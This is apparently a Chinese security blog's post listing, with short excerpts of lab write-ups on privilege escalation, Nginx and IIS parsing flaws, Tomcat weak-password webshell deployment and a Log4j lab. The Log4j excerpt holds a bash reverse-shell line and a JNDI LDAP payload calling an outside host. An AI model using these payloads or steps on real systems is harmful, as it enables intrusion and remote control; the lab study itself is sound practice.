- 博客(14)
- 收藏
- 关注
RSS订阅原创 Windows提权
windows权限认识(用户及用户组):Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些权限(permissions),它们具有管理本地计算机或访问本地资源的权限。
2024-05-08 14:14:59
1793
原创 Linux常用六种提权方式
SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。为可执行文件添加suid权限的目的是简化操作流程,让普通用户也能做一些高权限才能做的的工作。但是如果某些现有的二进制文件和实用程序具有SUID权限的话,就可以在执行时将权限提升为root。原理:SUID提权的原理与Linux进程的UID有关,进程在运行的时候有以下三个UID:(A)Real UID:执行该进程的用户的UID。
2024-05-08 13:52:39
3348
原创 Windows历史命令
方法一:打开“开始”菜单,输入“eventvwr.msc”,然后按“回车”键打开“事件查看器”。2. 在“事件查看器”窗口中,展开“Windows日志”节点,然后展开“应用程序”节点。3. 在“应用程序”节点下,双击“Microsoft-Windows-CommandProcessor/Operational”日志文件,查看其中的事件记录,即可找到cmd敲的命令记录。方法二:打开“开始”菜单,输入“cmd”,然后按“回车”键打开“命令提示符”窗口。
2024-05-06 16:51:48
785
1
原创 Linux计划任务
u:只有root才能进行这个任务,也可以帮其他使用者建立/移除crontab工作排程。-r:移除所有的crontab工作内容。-e:编辑crontab的工作内容。-l:查阅crontab的工作内容。
2024-05-06 16:36:09
225
1
原创 Linux日志基础
Linux系统日志是记录了系统运行状态、程序运行情况以及系统事件的文件。它包含了各种级别的信息,从调试信息和错误报告到警告和系统事件等。Linux系统日志主要分为四个部分:内核日志、系统日志、安全日志和应用程序日志。通过查看系统日志,管理员可以了解系统的状态和运行情况,诊断问题并进行故障排除。
2024-05-06 15:11:19
819
1
原创 Nginx 1.25.5文件解析漏洞复现
5. 访问/uploadfiles/fb5c81ed3a220004b71069645f112867.png,文件没有被解析。4.修改文件后缀名,Content-Type类型为image/png,最后在文件内容的头部添加GIF89a,上传文件成功。1.进入/vulhub/nginx/nginx_parsing_vulnerability目录,启动docker。3.上传一个php文件,页面显示我们只能上传图像文件。6.在后面添加/.php,文件被成功解析。8.访问文件,被解析成功。7.上传一个木马文件。
2024-04-24 17:18:08
866
1
原创 Win8部署IIS+复现IIS 7.5图片解析漏洞
16.右键点击添加模块映射,其中第一行表示任意以php结尾的文件;第三行是在PHP安装目录下找到响应的可执行程序,参考下一张图设置;14.安装后,在小皮面板的软件管理处,安装php5.4.45版本。打开IIS管理器,双击刚刚新建的网站,找到处理程序映射,双击。11. 新建文件夹,本实验命名为upload,新建TXT文件,输入内容。10.右键点击默认网站站点,选择管理网站->停止,然后删除站点。17.双击IIS服务器,找到FastCGI配置,双击打开。8. 选择需要安装的服务,点击下一步。
2024-04-24 16:45:55
471
4
原创 Tomcat弱口令后台部署war包getshell
3.点击Manager App,跳转http://127.0.0.1:8080/manager/html,要求登录验证。6.使用auxiliary/scanner/http/tomcat_mgr_login模块,查看详细信息。1.进入/vulhub/tomcat/tomcat8目录,启动docker。8.运行模块,爆破得出用户名和密码:tomcat:tomcat。13. 打开蚁剑,输入url,密码cmd,成功getshell。11.使用cmd命令,将jsp文件打包成war包。7.设置目标IP和目标端口。
2024-04-24 11:07:32
2399
原创 kali安装docker+log4j靶场搭建及复现
14.下载JNDI注入工具 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar。后面的内容改为:${jndi:ldap://vuanqq.dnslog.cn}bash -i >& /dev/tcp/主机IP/监听端口 0>&1。4.安装完成,查看docker和docker-compose版本。9.访问网址:http://192.168.0.130:8983。3.安装docker,docker-compose。1.添加docker的gpc秘钥,apt源。
2024-04-01 11:08:52
478
原创 ubuntu实现redis远程访问
2.修改redis.conf配置文件,将bind 127.0.0.1 -::1注释掉,这样才能远程访问。4.用另一台主机访问redis服务器。3.重启redis服务。
2024-03-06 20:05:54
321
原创 Ubuntu20.04 LAMP部署DVWA环境
14.将/DVWA/config文件夹中的config.inc.php.dist文件复制一份,改名为config.inc.php。17.浏览器访问http://ip/DVWA,点击create database,自动跳转到DVWA登录页面。6.9访问http://ip/a.php,网页显示了phpinfo信息。9.在表user中创建账户名为dvwa,密码为password的用户。2.解压到文件夹/var/www/html。15.修改config.inc.php文件。6.6修改php.ini配置文件。
2024-03-06 18:49:22
1121
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人